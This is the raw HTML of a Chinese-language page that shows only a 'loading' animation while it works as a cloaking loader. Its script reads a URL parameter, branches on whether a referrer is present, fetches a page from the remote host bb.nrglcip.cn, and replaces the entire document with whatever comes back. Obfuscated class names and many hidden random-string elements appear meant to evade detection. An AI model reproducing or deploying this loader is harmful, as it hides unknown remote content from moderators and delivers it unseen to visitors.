<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BmK5fEwN8w {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BmK5fEwN8w .M4D4RNmBxh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BmK5fEwN8w .content {
            line-height: 50px;
            text-align: center
        }

        .BmK5fEwN8w .img {
            width: 100%
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi {
            text-align: center
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BmK5fEwN8w .GNn4Gy4Yxgi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BmK5fEwN8w .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function McSxm9zeG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ysjfqz = McSxm9zeG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ysjfqz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ysjfqz +".html?a=share";
		}
		
        y7IWyPAuvo=url+"#"+new Date().getTime();
        y7IWyPAuvo && function() {
            $.get(y7IWyPAuvo, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>x9za3F675VubehVeOywaCdkIFN1IsdegWtR5iEuqCCgE0Dt0IhhGP8F9btl3QGq35YM7XY</span>
<a  href='#' style='display:none'>DfXeycoXIGaFg9c4HtlZL</a>
<img  src='' style='display:none'>
<span style='display:none'>x9za3F675VubehVeOywaCdkIFN1IsdegWtR5iEuqCCgE0Dt0IhhGP8F9btl3QGq35YM7XY</span>
<span style='display:none'>x9za3F675VubehVeOywaCdkIFN1IsdegWtR5iEuqCCgE0Dt0IhhGP8F9btl3QGq35YM7XY</span>
<span style='display:none'>x9za3F675VubehVeOywaCdkIFN1IsdegWtR5iEuqCCgE0Dt0IhhGP8F9btl3QGq35YM7XY</span>
<ul style='display:none' >VLntHdqMZ1GpYl4sETWIbpV6lRdA2CrvEkbmWN0bmJeYZ6KxmOuMXQVdXsfavFpmgHGPZRxKiFpz9</ul>
<img  src='' style='display:none'>
<p  style='display:none'>BffBMxZ24kII1hpJUU7mm0cu9fvaEoT8AT8dR5m0F</p><div class="BmK5fEwN8w">
    <div class="M4D4RNmBxh">
        <div class="GNn4Gy4Yxgi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >fE2ezUSJsNaQr6GWGxnz6LZwdlSqCyZFadtNrUichlcsZC1VdH6D0kuDXThqvVS0apWESpcJDPEl6X8b5</li>
<h1 style='display:none' >owxtLJxuFfzGSphPcGc8GOz5G0mcjjdZ2LRSAKrPiV1H3F9Dmi7e3tPjKw9u34B0U</h1>
<p  style='display:none'>lQhew6GRUvShMbHMc8oZQJD</p>
<li style='display:none' >fE2ezUSJsNaQr6GWGxnz6LZwdlSqCyZFadtNrUichlcsZC1VdH6D0kuDXThqvVS0apWESpcJDPEl6X8b5</li>
<b style='display:none' >VOMd1A3oR0NfYiPIadSIDTD7w6QWbuJdDqfwozPjdbetWTsUMwWeFLAJiTjf7FZ48Eyv9XrNhV</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>vWRk7UaYzrwUS39CEmTVDe9wGF1</span>
<span style='display:none'>vWRk7UaYzrwUS39CEmTVDe9wGF1</span></body>
</html>